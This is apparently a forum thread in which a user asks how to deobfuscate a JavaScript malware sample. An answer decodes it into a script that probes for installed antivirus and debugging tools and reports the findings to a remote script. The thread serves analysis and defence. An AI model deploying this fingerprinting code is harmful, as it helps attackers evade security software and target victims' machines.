# Javascript Malware deobfuscation

Tags: javascript, malware, deobfuscation

I found some kind of malware in JavaScript. As it's obfuscated and quite long, I need some idea how to deobfuscate it automaticly. It would take too much time to recover it line by line...

Sorry for the long code, I have no idea what it's doing right now...
Here we go:

```js
<script>
    var raelpit = [],
        zfpamzl = 0,
        cndelds = 0,
        tclnil = 0,
        tctidehr = 0,
        ucaeggs = 0,
        datmpeb = false,
        esrent =
        "yotnRrwCp tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq"
        .replace(
            /[wDLOCHMXqARZJmPjUFVkKIuQ]/g,
            "").substr(20, 0);

    function pbpiakd(ldrefdu) {
        hntpeeed = hntpeeed.replace(/^/,
            ldrefdu + 2);
    }

    function nrimsm(rhteayms) {
        var uohsev;
        uohsev = document.createElement(
            'MsAPTuostrDIYkIXuCN dlTyOWYIhhoqkiaBQZrLcHPZlimcAfgskdzfyiteTWklYsoYiJaMgdgKnMksr'
            .replace(
                /[WzfkHCAcyKZJOIQTPLMqYNtDBX]/g,
                '').substr(16, 3));
        uohsev.style.display =
            'rsfcTkqhgWpJHebtTtyZeTuicXUelnnn hkCQZznoZNWOHMneoocNaWJsmQTe'
            .replace(
                /[CHhyWZXpckbaNQrUgTiMJqzO]/g,
                '').substr(13, 4);
        vneltoas = oerriik << 4;
        vneltoas = rhteayms +
            'caeFzeFnpVimjoFzmlzFteibaRAjNhTBg ecyrZIVeiOj/#lsoFLlyokLCiSPA mArznfxiqeRMe'
            .replace(
                /[PIVLyRMBjNOzTSqAakZxFmC]/g,
                '').substr(20, 2) +
            vneltoas +
            'WtmhqoltvUesTyLfl SwEYxYIVprgkaYnLpUeuGtUvwsAeaLCFPwIz/IfiNZsuJmMioSXc yfsiKGinAIYljNpWnAbJzh'
            .replace(
                /[LjXTZqIzENCMFuaUySvkGKPAxYJWwV]/g,
                '').substr(20, 1) +
            'iZBsjedZhkJzLAptzAyi qiqhkleTcUjzJRQoMNreS aX_B1JvArVioCxsi DOQjxMfSDhmeeUiRbntXhqgN sNsufmcmnbLoB'
            .replace(
                /[AqLOxXzTDmjVZMJkCbNhRfBUQS]/g,
                '').substr(18, 2);
        uohsev[
                'HeghFqeURMdteeYTV GOkJermrnwoee uZOMiOBeGkUucTqtpyGKfOjExTyLXvIzlVbGTaIJLrBflPeEdRD qfUUhqxnosSUiFl'
                .replace(
                    /[bKxSFILVmYfHDoGkuUXORMTEJBqZP]/g,
                    '').substr(20, 7)] =
            rhteayms;
        vneltoas = vneltoas.replace(
            'AmKkUBncPWPehsxlBbeKIQ_aETpiOBPzZeJUrQRtM vnCdrGICeeFOuxu'
            .replace(
                /[CAIBUZhJTmFPKQWtMxGRsEO]/g,
                '').substr(7, 1),
            ' tkusnpia#hLHdrlBaDBbaZfrLjnA'
            .replace(
                /[kZBDH hrjdLpAs]/g,
                '').substr(5, 1));
        raelpit.push(uohsev);
        uohsev[
                'sJLewiXIBprUqPLnHekrBstSurHhlQBdVufZv rREQLrRezKnNsslwetNAkkttnhjribuEMBterivimZgaoRrqSc'
                .replace(
                    /[PUvlSkRIEpHMjfKBwhZVLqnXQJN]/g,
                    '').substr(18, 12)]
            (
                'wsNVNaiUOgRORrQrf rXgaTBPqnirjwsrbcatTiWutkeCDqOHGmLZDTYdxTf pxJRAGEladyaeqoQGGhtza'
                .replace(
                    /[CHkJZxzRdDOAQVWNPjqBwUTXGLEbY]/g,
                    '').substr(14, 3),
                this.location.href.substr(
                    1, 6).replace(
                    'EBVIgnQsjiTmStcwYWKYhtSUpWsobeaIeyOlcrj CiPOfOrilWZPF'
                    .replace(
                        /[KZQcUIVyETCOBWPjYfSFhw]/g,
                        '').substr(5, 3),
                    iyslenda) +
                vneltoas);
        var vlldlsy = document.body;
        vlldlsy.insertBefore(uohsev,
            vlldlsy.firstChild);
    }
    esrent =
        "uglGMVWkcnmEHV vp\\cChrIFUSGOSVfregScNwSM bAKlKue"
        .replace(
            /[HCENWvMOwKImGrFUSAbpV]/g,
            "").substr(7, 1);
    var dfrrtgrn =
        "GdBmpjlcQrLqZgKPsPo qWLliuhzgYQsGYaCVkx:\\wBIndOwJjTbsrrezAtDRFEhrblLkieBFJXYno"
        .replace(
            /[QXGAxVDkgTEFzWRbZKuLBYhPJjq]/g,
            "").substr(13, 10) + esrent +
        "OeHmNoCfgaaORtvHUtnqiLMPtsYseVPwyasBTLgrit oqSbnNrcsKrOvlUdXayTEpVn"
        .replace(
            /[KMVLSlTUEHBpPOXRmvbfqnNC]/g,
            "").substr(9, 2);

    function rreiqsfd(rhteayms) {
        nrimsm(
            "wInZGsoyejan hsadzqruTRj WJCKR:\\PIKIrvoSLgGrUMamU VkAYZRFSGiklRBBetsqt\\abDDbsZfiascNuBksSvx qUArMnplXr"
            .replace(
                /[DUbzSGwRWvtIMfkYAxjTqVLZXJByNK]/g,
                "").substr(14, 17) +
            rhteayms);
        nrimsm(
            "cYmdXopBKsSKeezasOIDsyuhqOiCHZX:\\PLNjDEBrvZogurkzfWBEamSDJyS MHyFBKilIes hE(x8MzA6AzI)M\\aBdXksfQanytWGI"
            .replace(
                /[KEQNMYuZHvqyWfOzJGhDjSkXBLIA]/g,
                "").substr(12, 23) +
            rhteayms);
    }
    dfrrtgrn +=
        "pjmbLrdOEdheitHINsrioxRUk CsuAtqbYemlXMxYeplhYnle"
        .replace(
            /[CjAXxIOYqEuMrbpkHLNUR]/g,
            "").substr(11, 4) + 3;
    var hntpeeed =
        "JisokTdXKOrYtObbprIdNrigveAhrskzbgUKRUErYcdRGTer TZVdfQVDEuYtLluuQie AWTgfYPL"
        .replace(
            /[ZTQNPKfkRWEJDVLYGgzOIUhXA]/g,
            "").substr(10, 7);
    var iyslenda =
        'tMUfiLBsqrRiskzPZFtAUdkve zANdxXSExbCskaCmesGfrpnjocwWeTUdPgEdtlh kGsItTuTikCUCLYSKpJ'
        .replace(
            /[UJIZEzCRhANfGqPLSlWjTBFKMxYvXwk]/g,
            '').substr(15, 1);
    setTimeout(function() {
        if (Math.random() < 0.2) {
            iyslenda =
                'JMeUoJjMimLQfqnHiYit rLbGjntearMrNHeGQhMnqgasi epdlSnUtc'
                .replace(
                    /[QHYLqSlUfGJjgdNM]/g,
                    '').substr(
                    9, 1) +
                iyslenda;
        } else {
            iyslenda +=
                "LgDfrBhINPUDxRqtDuQW dtuiEpxwAbPFnc szPScmMSsVYVkseOWlGSPc MKPOatQrUxtVCrJn ioz"
                .replace(
                    /[KEcVLFzIAPbfJGxMWUDYQSRBCNO]/g,
                    "").substr(
                    15, 1);
        }
        iyslenda = iyslenda.replace(
            /(.)\1+/g,
            'iJWiiyFNmaBdeOflqpw UOLelgkZ$1OstRWqJeehXxsdsNvukJAiPfesrXnVocb '
            .replace(
                /[FVvORLwBAXPUdJNpmoqZukWhx]/g,
                '').substr(
                12, 2));
        if (iyslenda.length < 3)
            setTimeout(
                arguments.callee,
                1)
    }, 1);
    hntpeeed += esrent;
    hntpeeed = esrent + hntpeeed;
    pbpiakd(dfrrtgrn);
    setTimeout(function() {
        {
            nrimsm(hntpeeed +
                "orxWLtneaQaChpIJh.sJWyFsdLKLRuTbHYAzrRlqDsurZJDcze GDTJMONmHOi"
                .replace(
                    /[KzcRMZJYNAmHqlxTLFObDhWGQ]/g,
                    "").substr(
                    6, 8));
            nrimsm(
                "pVJezLroei rLxJDYzlndjSRuiPyMQXFlUHpcBCvVU.sjyAKWsiouTeZzZeHcIfjvLMBeTSqKw jemhwLatiegh PfOchy"
                .replace(
                    /[wIHADJgTROSqzWvZKdBYLPMCxUVhj]/g,
                    "").substr(
                    11, 12)
            );
            nrimsm(hntpeeed +
                "OCTrGtWaSndSdZLdfyisATshiCmwwbIaCffm.fGsysiOjEKBzAioeWwnuEoJFgVcptYhaUUSJanSuvlvvkRXo fsaB"
                .replace(
                    /[FTZSvlLVwfgBACRJKjWIGOYXzEUr]/g,
                    "").substr(
                    12, 8));
            nrimsm(hntpeeed +
                "urnOXsTzagkVXL aDpcxVNCnMBVlhAMLTSwOiEssAxrmy.syUsnGsaoKFYbaILOro eUriyJvLUJpOXFaRDOVcsqLUfeWqJ KNKbtjNezs"
                .replace(
                    /[qLGNExfoICURXKDTFWJYhVzOtelj]/g,
                    "").substr(
                    12, 17)
            );
            nrimsm(hntpeeed +
                "evtshelSmAVlKQrsJF tVZsDyNNErmwNacRC.sINqylsWWrfAaBehugZtce oFnmoPiSWiIDQibZaCXC bsnLZY"
                .replace(
                    /[CLFKhQWBJNlvXIRqDYbVZAPStE]/g,
                    "").substr(
                    10, 8));
            nrimsm(hntpeeed +
                "IziejYsNxTJnurXNSrqWMazfRNFnmdbJIRJamgxcUqdqhSamQVekleon.sAyWvHsbeUtrOwuQ"
                .replace(
                    /[VdwkXFWOTvSNgzJQMRIqjxUYAH]/g,
                    "").substr(
                    10, 17)
            );
            rreiqsfd(
                "QOTpRciqsTeNMPUalwkafOPTZOvLNrZSePqqbWyDtes AUKNPntiKXF-gEXKYxYpjOfVPloiZtI\\mPqVGbkae.eBxQeFVjtSgCeQbhHZRuVdrKOdvaTHai QJkLlcSGSppSeunuK"
                .replace(
                    /[HYkVqfJjLQIRPhNXBKWOdSCvGDUTFZg]/g,
                    "").substr(
                    5, 34));
            rreiqsfd(
                "PncGhsrCSzBFuGQGTmGjUfssgEMalwQLGareKbYytesT LAnJWLti-MLfCfuaVflfTEwaYrSIe\\mNXufNObzSaXm.exLGDueipivOJGBPuzoBkIpsZWzqlDFCssobBuhFddODiD"
                .replace(
                    /[EJKSuYkjzGBfTdDWZFQNVPqUvOLCIX]/g,
                    "").substr(
                    9, 34));
            rreiqsfd(
                "OyDXtDBWeNnFOFacsCp epiXcvKqAVAGYFSGET SELoNfqBFtwWaPmKyrueW\\AJLqBPvaust\\AYvaYyDuDqEsztUKWzIORQzHW.exmeaKXebebQheOhblodBeYX BkcegzRGPPaBlZctroWelsc jHLWF"
                .replace(
                    /[zWRhOLXFBqdQGHbPmCJDEjZuKNycY]/g,
                    "").substr(
                    11, 32)
            );
            rreiqsfd(
                "PiFErtvVQSDPwbtDW MurukCsOsHhIzUPnnortoFxnRMDCz ZJsAVeLNEcOvXuMjjriVty\\BRrWhanDdiInIOGgqPpN\\mWVjuijs.dRkLjlAPxlotWQallRDa"
                .replace(
                    /[jGZRJCWLEFQUVHSpNPDMkqOxhIAXvz]/g,
                    "").substr(
                    13, 33)
            );
            rreiqsfd(
                "dUWNCrZaijoqh OUaUgiqifnOIWoQDrtqEowJOHn inQtAPerneSt sReAVLwxYcXkDIKurQiqYtpyOLAqW\\BranLVTdipbXCngA\\mwONuipbxbsDMK.LNHZbdQlltDcNDDHaDazbDd wxRIb"
                .replace(
                    /[OIkqSXDMCEZbPNWVYAjwTJKQpLHRxU]/g,
                    "").substr(
                    12, 42)
            );
            rreiqsfd(
                "eZamUyaDIegnLtdYc JjNhVeDvepyolYDlMtQZFPY-SeQcHuPrqeBA\\tbNYWyMXrjRXBhiAVkUjBggXEekGHrL.IezGxNeuyaJMgvaztiuHJG nRhcfKDThCEyejMuINIRePRDCtoaI"
                .replace(
                    /[ZQhfBCJyTWRLPDMIqbKAHGYEjUXVNkz]/g,
                    "").substr(
                    19, 20)
            );
            nrimsm(hntpeeed +
                "yBDrkagpVPdVAeiSeCx xWpZAitsuvkYsBjtz lmqZwOchrzqSXPfswNvbDROXtas.sJysHHlYsBDsnnDaHoA"
                .replace(
                    /[WvRjacwkVmxzNHJXPOBACZDYSq]/g,
                    "").substr(
                    20, 9));
            var siatsii =
                "eycsAPNjFjuQyewJ oaaGprOhoVmYUKUaZspRVermDsXZkNINhPTy DHLAgCab\\KhPNDQFaFjPspqerOskdy lDMpAqqziHnuHNiiQI "
                .replace(
                    /[hRMIHUdZYJODQVNFCXqGPjgcTmA]/g,
                    "").substr(
                    14, 24);
            rreiqsfd(siatsii +
                "rsqhcagAdeHXToBRtalX kwEIMzSweKggcuYQrNONPRiLJtyQC G15WGZUC.0.G2\\aIZQVvpORuWXGiM.QejxYeXfpnBRMAboOkgpA aIVPqxCjmsmb"
                .replace(
                    /[qLUYPRXBzHNWEQgKIGkMCwJmOjZAV]/g,
                    "").substr(
                    7, 31));
            rreiqsfd(siatsii +
                "XJsQPhmPwglzdj CTrjsLQDaEzzegnuZNEZKIntLerqnetzEFFY SCeAcXuhYLAErWiAtRy ff15P.0.2QqYq\\aOAvVOJGpuEUZi.exePmTzUahksMbDAoZEMjAD"
                .replace(
                    /[EXCJWTZqUMKYONFzjQbhVGPARfLD]/g,
                    "").substr(
                    14, 34)
            );
            rreiqsfd(siatsii +
                "eilaOJsMshOQJcOGkYrTFKTf mRtzSAyEntRiS-VhwiruIYRhZs 1U5FMT.S0lM.2\\aGFqPvpwEuMiyRWE.ZeTBNXxESespWPQRehiuecXYipdsqW jpUSHRQTWFsXfDbvqBgLQh BoC"
                .replace(
                    /[UGJMRPXLESzjqDCZlIHKNBFOWwYyTQh]/g,
                    "").substr(
                    12, 27)
            );
            rreiqsfd(siatsii +
                "TFNeUZLLJTeejikMQJCtMYbjSmYLHNallj qIOVGfficeAhG SDQecuAEUQQhrYBAityJ UWLBXh3\\sTNVtajrtCXWegrQQT_YATavp.WexEezErtCTWioDAWwwlgVKaern"
                .replace(
                    /[ZJVAITDFHBhCGgEWMUQLKYwqNXj]/g,
                    "").substr(
                    7, 39));
            nrimsm(hntpeeed +
                "dOHpXcJRnOYHPNRzRKaLTemFLWTPjKsDeynIxWqXzPCTb ueiLuFoxoZPIFMrLdRSYriverLjskSRbYfilMHtUzOerMGwKw.QOsZHxyxsnyhrIngUaTQa ssehRuJLXCSUMEdoZ rog"
                .replace(
                    /[PSKOxEXRLFDYWQMmCjGTHJqUZNwIz]/g,
                    "").substr(
                    19, 19)
            );
            var sosvaki =
                "tSRlRKmwYaGmVpizjn SOXzKhheiaKQGeoFbTrehSVqKZnd MChSiCSPycro\\gQrEeaVDIBrOXiqsWexm USaxHeQnVihenmwouZqo"
                .replace(
                    /[WHqbEPhVKYCFUZIwRODQmXxBjGSyz]/g,
                    "").substr(
                    12, 12);
            rreiqsfd(sosvaki +
                "inEPmtLGLBmtqVltyZTYOLDiAdtaVnyViSum\\UIXEVFramHPeJhwHQHojyrkySZABdhYXXL\\uYiWPiNdnKECORShVMgBREErh.OXeKqRxeqYcaHYfbt slJZwDGhScdtteiKvSleifsrG"
                .replace(
                    /[SYARBE JqOPyHNVZGLdDKhjCQX]/g,
                    "").substr(
                    8, 33));
            rreiqsfd(sosvaki +
                "QiHGJNGWssaEAJQeyYBjpq tiZhyKKZlrXYAGTyQGWMjIEWDyOSkQ\\PrwzmUCVvonsLole.ezxefbGWuQtXNKQbrbnnzcLvnfdmosL"
                .replace(
                    /[QYvJEHUfNKALjyGOzXVkrBWZc]/g,
                    "").substr(
                    12, 20)
            );
            rreiqsfd(sosvaki +
                "HsFHrzBlLbgwiiluja rzzgRjishYSecZTFOuZTVHQriYXUzfty AHqDKqgZLentG\\PWFvCCDNXFWRtMovnXTmTf.RexJGeOqdJBQUZEepsXUvkqaXm"
                .replace(
                    /[HWvGXmVUfKOQpYJFERBLqDzZTj]/g,
                    "").substr(
                    17, 27)
            );
            rreiqsfd(sosvaki +
                "KnDkrpOebleeOEvWOXsGsCzzFlqieRWGbJnBtQE zSerZFQvUIJerd FSUBwOechurityLV VVjAhgeUqDVFHhbnKtR\\PJKzRBXJZEcJcINFYTMoGnLRWJ.eUxFeUGFltstWYJseribijIGLK lpaYXqpmibvkOiifoWhrDE"
                .replace(
                    /[XWRHEjGZwLJqKQzhBOdUVDpYbkIF]/g,
                    "").substr(
                    9, 41));
            rreiqsfd(sosvaki +
                "ignQsUjQOKmHt UEpQoqrYaEqFOljarUFsDZZ TDGLmtziTDfBFHrDSJeqNcDFFuYqHrqEBKiGtHyD SWUerLvFerG\\PYJCCWGLDZSRQVZ\\AGIQpaUcQhDeN2\\bKinY\\AGQzQJKYBpLGaXchDeMjJoqINnlOiQDtZoBrOOQ.FeZxeDlwjtyDTaOBGFqZtFFTHDntXXOiDcdYFnLUzIlnGgB kT"
                .replace(
                    /[YUKHJOBDjqLWETQGzNZXIlF]/g,
                    "").substr(
                    20, 52)
            );
            rreiqsfd(sosvaki +
                "oaoafntKtrBhphYWrPjTvHobCAKwsCPerE GuWYMardcF\\BKbPgVZfZVGUif.FePAxeanHsydEKLTdnqlPidjPTzhNhLmZ"
                .replace(
                    /[jchAgYEHVWCNbZvPzKfMLpTFq]/g,
                    "").substr(
                    8, 22));
            rreiqsfd(
                "ubaoTszEwVuQCe MlcNAfWwNee.Tcomq\\AjWJzygZSednzYWRFt\\mIQbcaWgentLN.exLyeRxQrtpInnSU riETr"
                .replace(
                    /[qzVERZYNwljIWSLdbCFJQyUT]/g,
                    "").substr(
                    7, 28));
            rreiqsfd(
                "DdecrRoidW ishmHCPJwciVt eRcAreIFYkifAddmokolYoKSekXLrfIRYB2U\\FPARLUYSKjOMiGjEqKddAlEXGPjerI.GDDexjeerAqteansmNJGNM KReLIesgphJrWurvAO"
                .replace(
                    /[OHPCjYMESfBKqWJVwXARoIkDLmGUN]/g,
                    "").substr(
                    18, 20)
            );
            rreiqsfd(
                "PSQuUIsaDwhHrRfBtJfruySsUWoFhPiddlWJer4JMAQP\\FATVidUJdler.BEBjVexEejKsnSuetnek REKl"
                .replace(
                    /[BPSUwREVJfHIDyKQAhTjWM]/g,
                    "").substr(
                    9, 20));
            rreiqsfd(
                "rWmflwWhzjwiiei atYrvscjXDgaAQiQr WoYRXTzKDWnlOERwZpmqenVPLMwKoNQoo\\UmWoEHnginJGswtazlWl.DoYJMCJexecGfrAGGSdEibpncsGnHeTGGBrm RugeYMuq"
                .replace(
                    /[fZRoGSLTXCgqYmKWMJjQBEwAzHD]/g,
                    "").substr(
                    20, 21)
            );

            rreiqsfd(
                "qHiKwzkKtsrnuifawSPymODZanZteFYGc\\LKivqJhhIeUApwEdDPTDafte\\MOHwKSVACRWKKhO71F.dllNNBatkEQAkQFeFaaDoW bGZOcqIFxulEHgj"
                .replace(
                    /[TjIwWDkNGrKFAhPqfYJOHZQzEB]/g,
                    "").substr(
                    7, 31));
            rreiqsfd(
                "VBndqwbqGfbqUgICoLQQjDKkRuIOOBLmmon PFilXzTejs\\SGykTmanJJteNc ShareBudLRZOPII\\ckcEvPXVtMjgr.ewxeNGUtiuBNcTbauTmXaog piQQetniAI"
                .replace(
                    /[QwjTkABLPZDRVGzJfNKUIXuOq]/g,
                    "").substr(
                    5, 41));

        }
        setTimeout(stwsiis,
            1000);
    }, 1500);

    function stwsiis() {
        if (datmpeb) return;
        datmpeb = true;
        var ctstahjh =
            "liXksvXsyWoruOMnFzXOmtpTEXikAxfteZ"
            .replace(
                /[TvpXAWxOZMzEkyF]/g,
                "").substr(6, 0),
            ildciea = 0;
        for (var i in raelpit) {
            var found = false;
            try {
                if (raelpit[i][
                        'cShtxvaLencnaoatQtL FfrKfXQwilLCeUpSwdatedDkaRwtmrVeHtuezJtesmB'
                        .replace(
                            /[KrzCkRLSBJFvuXQHmnchxwVo]/g,
                            '').substr(
                            9, 15)
                    ] ==
                    "zmsXeRLNnyaWsqXBFXxiyebgrPzhtmEIeYdBneTsiBqtfaPcv ZqksmonDwKuE"
                    .replace(
                        /[xKYyqPWXzNoEBDTgFbLZifIR]/g,
                        "").substr(11,
                        0)) found =
                    false;
                else found = true;
            } catch (e) {
                found = true;
            }
            if (found > 0) ctstahjh +=
                ildciea +
                'LliwOoCNpsBcSinerBMeb qhzUJeGu,ySOsqgTZNWMgQXEyDvjeTUi '
                .replace(
                    /[qOSGNWjUEsXlLQwDTCBJpZMz]/g,
                    '').substr(13, 1);
            ildciea++;
        }
        var nlmata = document[
                'RYsegzNnKntFa gpdocrptGsWehcJINqPrJAKeatyTCMGOevFOhEYleVMmentuKfmOaHqRrphOzVDr'
                .replace(
                    /[GONFJDVgKqAzvpydhRCHWPMITY]/g,
                    '').substr(13, 13)]
            (
                'eLzSdbgaMunpJDvV VlfHXIyGqdnWGoaBzBpssI ktEscFRXHHeOHiDrGyCwGPWleJmoyeHIWsFblhpIsi'
                .replace(
                    /[MGDEBILypHvbSJOCzRXoPVWF]/g,
                    '').substr(18, 2) +
                'PpvyPtrwSiFyhRLxraviptngIqmwteslKlkF LbMOkCsjVWGztMoVur'
                .replace(
                    /[jwKbSMFgWvPOCGaqzImxVRsLh]/g,
                    '').substr(6, 4));
        nlmata[
                'MBdQDhogneFIrnWlAPJWjpsDx mpvqBcXxiiGfBhYuJOKshUrcrCLyilQxbdlFee'
                .replace(
                    /[WhgQFKJBLYGMfDOXCxPUqjAIo]/g,
                    '').substr(16, 3)] =
            'mViEuZlOFaEZqtuKnCUqwnCKjlovxLr.htpm?equksWfPkcDd'
            .replace(
                /[aFCpZqKdLVDwOrPUoEWk]/g,
                '').substr(8, 9) + Math
            .random() +
            'MXiZAQHnTfnkcAjpau,LrKsxxtezwDFsfbdeX EusNeEnKVIslTBgPCm'
            .replace(
                /[EHCBMIPZufDXAQxLFKbrTdNjtkV]/g,
                '').substr(6, 1) +
            ctstahjh;
        var yilwre = document.body;
        yilwre.insertBefore(nlmata,yilwre.firstChild);
    }
</script>
```

Comment: What are you going to do after you deobfuscate it?

Comment: Was it in a script tag or a .js file? Its very unlikely, but the people that made it might have been stupid enough to include a source map.

Comment: What approaches do you use when trying to deobfuscate JavaScript code?  
check this: https://deobfuscate.io/

Answer (score 0):

Well, I took the setTimeout function and assigned it to a variable and then used debug(this_variable); this_variable(); to see what it did but it wasn't super helpful.

There are a few ways to tackle this I think but the first step is definitely decoding it. I don't need too bad posting this here because it won't run by itself (at least one variable isn't defined.)

Hopefully this does a bit of the work for you though =)

```
 var raelpit = [],
 zfpamzl = 0,
 cndelds = 0,
 tclnil = 0,
 tctidehr = 0,
 ucaeggs = 0,
 datmpeb = false,
 esrent = '';

function pbpiakd(ldrefdu) {
    hntpeeed = hntpeeed.replace(/^/, ldrefdu + 2);
}

function nrimsm(rhteayms) {
    var uohsev = document.createElement('img');
    uohsev.style.display = 'none';

    // vneltoas is not defined =/
    vneltoas = oerriik << 4;
    vneltoas = rhteayms + '/#' + vneltoas + '/' + '_1';

    uohsev['tpyjyvz'] = rhteayms;
    vneltoas = vneltoas.replace('_', '#');

    raelpit.push(uohsev);

    // CURRENT SITE STARTS WITH HTTP?... The next line takes a substring and 
    // then replaces part of it with the value of iyslenda... If the site starts with 
    // http:// then you can just assume the final code will be 'iyslenda://' + vneltoas;
    // In this case, I've rewritten it to do the same thing but cleaner. That is unless
    // the document ISN'T http but ftp or something else, of course. =)
    uohsev['setAttribute']('src', iyslenda + '://' + this.document.location.href.substr(7) + vneltoas);

    var vlldlsy = document.body;
    vlldlsy.insertBefore(uohsev, vlldlsy.firstChild);
}

esrent = "\";
dfrrtgrn = "C:\wIndOws\sY";

function rreiqsfd(rhteayms) {
    nrimsm("C:\Program Files\" + rhteayms);
    nrimsm("C:\Program Files (x86)\" + rhteayms);
}

dfrrtgrn += "C:\wIndOws\sYstem3";
var hntpeeed = 'drivers';
var iyslenda = 'e';

setTimeout(function() {
    if (Math.random() < 0.2) {
            iyslenda = 'r' + iyslenda;
    }
    else {
            iyslenda += 's';
        }
    }

    iyslenda.replace(/(.)\1+/g, '$1');

    if (iyslenda.length < 3) {
        setTimeout(arguments.callee, 1)
    }
}, 1);

 hntpeeed += esrent;
 hntpeeed = esrent + hntpeeed;
 pbpiakd(dfrrtgrn);

setTimeout(function() {
    {
        nrimsm(hntpeeed + 'aCpI.sys');
        nrimsm('iyQXFlpc.sys');
        nrimsm(hntpeeed + 'mbam.sys');
        nrimsm(hntpeeed + 'MBAMSwissArmy.sys');
        nrimsm(hntpeeed + 'mwac.sys');
        nrimsm(hntpeeed + 'mbamchameleon.sys');
        rreiqsfd('Malwarebytes Anti-Exploit\mbae.exe');
        rreiqsfd('Malwarebytes Anti-Malware\mbam.exe');
        rreiqsfd('AVAST Software\Avast\AvastUI.exe');
        rreiqsfd('norton security\Branding\muis.dll');
        rreiqsfd('norton internet security\Branding\muis.dll');
        rreiqsfd('F-Secure\trigger.exe');
        nrimsm(hntpeeed + 'fsbts.sys');

        var siatsii = 'Kaspersky Lab\Kaspersky ';
        rreiqsfd(siatsii + 'Total Security 15.0.2\avpui.exe');
        rreiqsfd(siatsii + 'Internet Security 15.0.2\avpui.exe')
        rreiqsfd(siatsii + 'Anti-Virus 15.0.2\avpui.exe');
        rreiqsfd(siatsii + 'Small Office Security 3\starter_avp.exe');
        nrimsm(hntpeeed + 'driverskbfilter.sys');

        var sosvaki = 'Trend Micro\';
        rreiqsfd(sosvaki + 'Titanium\UIFramework\uiWinMgr.exe');
        rreiqsfd(sosvaki + 'TMIDS\PwmConsole.exe');
        rreiqsfd('Security Agent\PCCNtMon.exe');
        rreiqsfd('Client Server Security Agent\PccNTMon.exe');
        rreiqsfd('Security Server\PCCSRV\Apache2\bin\ApacheMonitor.exe');
        rreiqsfd('Browser Guard\BGUi.exe');
        rreiqsfd('Fiddler2\Fiddler.exe');
        rreiqsfd('Fiddler4\Fiddler.exe');
        rreiqsfd('OpenVPN\Uninstall.exe');
        rreiqsfd('Symantec\LiveUpdate\MSVCR71.dll');
        rreiqsfd('Common Files\Symantec Shared\ccEvtMgr.exe');
    }

    setTimeout(stwsiis, 1000);
}, 1500);

function stwsiis() {
    if (datmpeb) 
        return;

    datmpeb = true;

    var ctstahjh = '', 
            ildciea = 0;

    for (var i in raelpit) {
        var found = false;

        try {
            if (raelpit[i]['fileUpdatedDate'] == '') 
                found = false;
            else 
                found = true;
        } catch (e) {
            found = true;
        }

        if (found > 0) 
            ctstahjh += ildciea + ',';

        ildciea++;
    }

    var nlmata = document['createElement']('script');
    nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh;
    var yilwre = document.body;
    yilwre.insertBefore(nlmata,yilwre.firstChild);
}
```

Yes, I'd definitely say something looks fishy there ;-)

**Be careful!**

(also, sorry about the syntax highlighting. There is only so much I can do right now, I have to leave sorry...)

Answer (score 0):

You can replicate this malware in a safe environment (VirtualBox or Vmware), I think this is the best way to know what this Js is doing is replicate this in console or in browser.
If you want to replicate this in console you can use https://developer.mozilla.org/es/docs/SpiderMonkey

Maybe you can get an idea of what is doing reading the source code, but if you replicate the malware, you can understand in a 100% of what is doing.

I hope this help.
Regards.